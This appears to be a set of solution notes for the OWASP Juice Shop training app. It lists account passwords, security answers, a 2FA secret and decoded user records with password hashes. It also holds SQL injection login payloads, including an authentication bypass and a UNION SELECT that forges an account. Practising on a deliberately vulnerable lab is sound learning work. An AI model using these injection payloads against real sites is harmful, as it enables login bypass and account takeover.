Users Data in Juice-Shop and Others;
Password = admin123
{ "status": "success", "data": { "id": 1, "username": "", "email": "admin@juice-sh.op", "password": "0192023a7bbd73250516f069df18b500", "role": "admin", "deluxeToken": "", "lastLoginIp": "undefined", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-10-19 13:00:04.308 +00:00", "updatedAt": "2020-10-19 13:59:01.826 +00:00", "deletedAt": null }, "iat": 1603116006, "exp": 1603134006 }
Password = Mr. N00dles
{ "status": "success", "data": { "id": 8, "username": "", "email": "mc.safesearch@juice-sh.op", "password": "b03f4b0ba8b458fa0acdc02cdb953bc8", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-11-29 12:22:43.104 +00:00", "updatedAt": "2020-11-29 12:22:43.104 +00:00", "deletedAt": null }, "iat": 1606655036, "exp": 1606673036 }
Password = K1f.....................
{ "status": "success", "data": { "id": 11, "username": "", "email": "amy@juice-sh.op", "password": "030f05e45e30710c3ad3c32f00de0473", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-12-05 10:51:02.978 +00:00", "updatedAt": "2020-12-05 10:51:02.978 +00:00", "deletedAt": null }, "iat": 1607165772, "exp": 1607183772 }
but you can use this email too => bjoern@owasp.org
Password = bW9jLmxpYW1nQGhjaW5pbW1pay5ucmVvamI=
Security answer = Zaya
Security answer = West-2082
Zip = 25436 => West-2082
{ "status": "success", "data": { "id": 13, "username": "", "email": "bjoern@owasp.org", "password": "9283f1b2e9669749081963be0462e466", "role": "deluxe", "deluxeToken": "efe2f1599e2d93440d5243a1ffaf5a413b70cf3ac97156bd6fab9b5ddfcbe0e4", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/12.jpg", "totpSecret": "", "isActive": true, "createdAt": "2020-12-22 11:44:09.327 +00:00", "updatedAt": "2020-12-22 11:44:09.327 +00:00", "deletedAt": null }, "iat": 1608637987, "exp": 1608655987 }
Password = ncc-1701
Security Questiob = Samuel
{ "status": "success", "data": { "id": 2, "username": "", "email": "jim@juice-sh.op", "password": "e541ca7ecf72b8d1286474fc613e5e45", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-11-25 14:39:09.207 +00:00", "updatedAt": "2020-11-25 14:39:09.207 +00:00", "deletedAt": null }, "iat": 1606320235, "exp": 1606338235 }
Password = Stop'n'Drop
You can use for enter = ' or 1=1 and email like('%bender%');--
{ "status": "success", "data": { "id": 3, "username": "", "email": "bender@juice-sh.op", "password": "0c36e517e3fa95aabf1bbffc6744a4ef", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-11-25 14:39:09.207 +00:00", "updatedAt": "2020-11-25 14:39:09.207 +00:00", "deletedAt": null }, "iat": 1606321399, "exp": 1606339399 }
Enter for = chris.pike@juice-sh.op'--
security answer = Silence of the Lambs
{ "status": "success", "data": { "id": 16, "username": "", "email": "uvogin@juice-sh.op", "password": "05f92148b4b60f7dacd04cceebb8f1af", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-12-25 11:55:39.720 +00:00", "updatedAt": "2020-12-25 11:55:39.720 +00:00", "deletedAt": null }, "iat": 1608897572, "exp": 1608915572 }
Security answer = Snowball => 5N0wb41L
SQL ınjection is = ' UNION SELECT * FROM (SELECT 15 as 'id', '' as 'username', 'acc0unt4nt@juice-sh.op' as 'email', '12345' as 'password', 'accounting' as 'role', '123' as 'deluxeToken', '1.2.3.4' as 'lastLoginIp' , '/assets/public/images/uploads/default.svg' as 'profileImage', '' as 'totpSecret', 1 as 'isActive', '2020-08-16 14:14:41.644 +00:00' as 'createdAt', '2020-08-16 14:33:41.930 +00:00' as 'updatedAt', null as 'deletedAt')--
"data": { "id": 15, "username": "", "email": "acc0unt4nt@juice-sh.op", "password": "12345", "role": "accounting", "deluxeToken": "123", "lastLoginIp": "1.2.3.4", "profileImage": "/assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-08-16 14:14:41.644 +00:00", "updatedAt": "2020-08-16 14:33:41.930 +00:00", "deletedAt": null }, "iat": 1610024731, "exp": 1610042731 }
2FA Token = IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH => generate with authenticator.